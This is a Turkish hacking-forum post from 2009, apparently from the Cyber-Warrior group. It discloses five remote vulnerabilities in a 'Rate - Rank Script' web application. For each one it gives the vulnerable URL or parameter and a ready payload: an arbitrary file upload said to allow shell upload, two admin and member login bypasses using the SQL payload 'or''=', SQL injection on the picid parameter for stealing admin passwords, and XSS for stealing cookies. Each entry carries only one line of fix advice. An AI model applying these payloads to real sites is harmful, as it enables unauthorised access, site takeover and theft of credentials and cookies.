ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Rate - Rank Script ~ 5 Remote Vuln.
Rate - Rank Script ~ 5 Remote Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/CWOmer
Date :
12.07.2009 21:23:43
#
Rate - Rank Script ~ 5 Remote Vuln.
[Full Screen Display]
Image Shell ; < ------------------- header data start ------------------- > ############################################################# # Application Name : Rate - Rank Script # Vulnerable Type : Arbitrary File Upload Vulnerability # Infection : Shell Atilarak Site Hacklenebilir # Risk : Yüksek # author : Bug Researchers | CWOmer ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > http://www.ezonescripts.com/productdemos/RateRank/Member_Admin/addSubImage.php?picid=269859 < -- bug code end of -- > Login Bypass 1 ; < ------------------- header data start ------------------- > ############################################################# # Application Name : Rate - Rank Script # Vulnerable Type : Login Bypass # Infection : Login Panelinde sifresiz giris yapilabilir # Bug Fix Advice : Login Paneli Filtrelenmeli # author : Bug Researchers | CWOmer # Script Demo : http://www.ezonescripts.com/productdemos/RateRank/Site_Admin/index.php ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > username: ’or’’=’ password: ’or’’=’ < -- bug code end -- > Login Bypass 2 ; < ------------------- header data start ------------------- > ############################################################# # Application Name : Rate - Rank Script # Vulnerable Type : Login Bypass # Infection : Login Panelinde sifresiz giris yapilabilir # Bug Fix Advice : Login Paneli Filtrelenmeli # author : Bug Researchers | CWOmer # Script Demo : http://www.ezonescripts.com/productdemos/RateRank/Member_Admin/index.php ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > username: ’or’’=’ password: ’or’’=’ < -- bug code end -- > SQL Inj ; < ------------------- header data start ------------------- > ############################################################# # Application Name : Rate - Rank Script # Vulnerable Type : SQL Injection # Infection : Yönetici User Ve passleri çalinabilir # Bug Fix Advice : picid degiskeni filtrelenmeli # author : Bug Researchers | CWOmer ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > RateRank/Site_Admin/member.php?picid=269859[SQL] < -- bug code end of -- > XSS ; < ------------------- header data start ------------------- > ############################################################# # Application Name : Rate - Rank Script # Vulnerable Type : Cross Site Scripting # Infection : Yönetici ve User cookie’leri çekilebilir. # Bug Fix Advice : Zararli karakterler filtrelenmelidir. # author : Bug Researchers | CWOmer ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > Inputlara XSS komutu girilmeli < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
